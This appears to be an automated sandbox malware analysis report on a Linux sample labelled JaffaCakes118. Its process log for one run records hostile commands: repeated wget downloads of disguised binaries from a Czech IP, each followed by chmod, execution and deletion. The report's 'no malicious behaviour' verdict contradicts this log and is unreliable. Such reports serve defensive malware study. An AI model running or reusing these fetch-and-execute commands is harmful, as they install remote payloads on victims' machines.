Malware Analysis Report

2024-11-13 13:22

Sample ID 240616-13enkszgqa
Target b56dc03f37d69b6ea1ee20c4d59ec13f_JaffaCakes118
SHA256 89636c6b497c8d80ac5043a61296c7b5e4422d1f0b96a414f15d0df5beb16e6c
Tags
score
1/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
1/10

SHA256

89636c6b497c8d80ac5043a61296c7b5e4422d1f0b96a414f15d0df5beb16e6c

Threat Level: No (potentially) malicious behavior was detected

The file b56dc03f37d69b6ea1ee20c4d59ec13f_JaffaCakes118 was found to be: No (potentially) malicious behavior was detected.

Malicious Activity Summary

N/A

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-06-16 22:10

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-16 22:10

Reported

2024-06-16 22:12

Platform

debian9-armhf-20240611-en

Max time network

26s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-16 22:10

Reported

2024-06-16 22:10

Platform

debian9-mipsbe-20240611-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-16 22:10

Reported

2024-06-16 22:10

Platform

debian9-mipsel-20240418-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-16 22:10

Reported

2024-06-16 22:12

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

3s

Max time network

128s

Command Line

[/tmp/b56dc03f37d69b6ea1ee20c4d59ec13f_JaffaCakes118]

Signatures

N/A

Processes

/tmp/b56dc03f37d69b6ea1ee20c4d59ec13f_JaffaCakes118

[/tmp/b56dc03f37d69b6ea1ee20c4d59ec13f_JaffaCakes118]

/usr/bin/wget

[wget http://89.203.249.29/ntpd]

/bin/chmod

[chmod +x ntpd]

/tmp/ntpd

[./ntpd]

/bin/rm

[rm -rf ntpd]

/usr/bin/wget

[wget http://89.203.249.29/sshd]

/bin/chmod

[chmod +x sshd]

/tmp/sshd

[./sshd]

/bin/rm

[rm -rf sshd]

/usr/bin/wget

[wget http://89.203.249.29/openssh]

/bin/chmod

[chmod +x openssh]

/tmp/openssh

[./openssh]

/bin/rm

[rm -rf openssh]

/usr/bin/wget

[wget http://89.203.249.29/bash]

/bin/chmod

[chmod +x bash]

/tmp/bash

[./bash]

/bin/rm

[rm -rf bash]

/usr/bin/wget

[wget http://89.203.249.29/tftp]

/bin/chmod

[chmod +x tftp]

/tmp/tftp

[./tftp]

/bin/rm

[rm -rf tftp]

/usr/bin/wget

[wget http://89.203.249.29/wget]

/bin/chmod

[chmod +x wget]

/tmp/wget

[./wget]

/bin/rm

[rm -rf wget]

/usr/bin/wget

[wget http://89.203.249.29/cron]

/bin/chmod

[chmod +x cron]

/tmp/cron

[./cron]

/bin/rm

[rm -rf cron]

/usr/bin/wget

[wget http://89.203.249.29/ftp]

/bin/chmod

[chmod +x ftp]

/tmp/ftp

[./ftp]

/bin/rm

[rm -rf ftp]

/usr/bin/wget

[wget http://89.203.249.29/pftp]

/bin/chmod

[chmod +x pftp]

/tmp/pftp

[./pftp]

/bin/rm

[rm -rf pftp]

/usr/bin/wget

[wget http://89.203.249.29/sh]

/bin/chmod

[chmod +x sh]

/tmp/sh

[./sh]

/bin/rm

[rm -rf sh]

/usr/bin/wget

[wget http://89.203.249.29/[cpu]]

/bin/chmod

[chmod +x [cpu]]

/tmp/[cpu]

[./[cpu]]

/bin/rm

[rm -rf [cpu]]

/usr/bin/wget

[wget http://89.203.249.29/apache2]

/bin/chmod

[chmod +x apache2]

/tmp/apache2

[./apache2]

/bin/rm

[rm -rf apache2]

/usr/bin/wget

[wget http://89.203.249.29/telnetd]

/bin/chmod

[chmod +x telnetd]

/tmp/telnetd

[./telnetd]

/bin/rm

[rm -rf telnetd]

Network

Country Destination Domain Proto
CZ 89.203.249.29:80 89.203.249.29 tcp
N/A 224.0.0.251:5353 udp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.65.91:443 tcp
US 151.101.65.91:443 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
GB 195.181.164.19:443 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp
CZ 89.203.249.29:80 89.203.249.29 tcp
CZ 89.203.249.29:443 tcp

Files

N/A